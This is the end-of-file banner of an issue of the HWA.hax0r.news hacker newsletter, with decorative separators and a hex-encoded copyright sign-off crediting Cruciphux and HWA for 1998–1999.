Cruciphux/HWA.hax0r.news <tm> (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]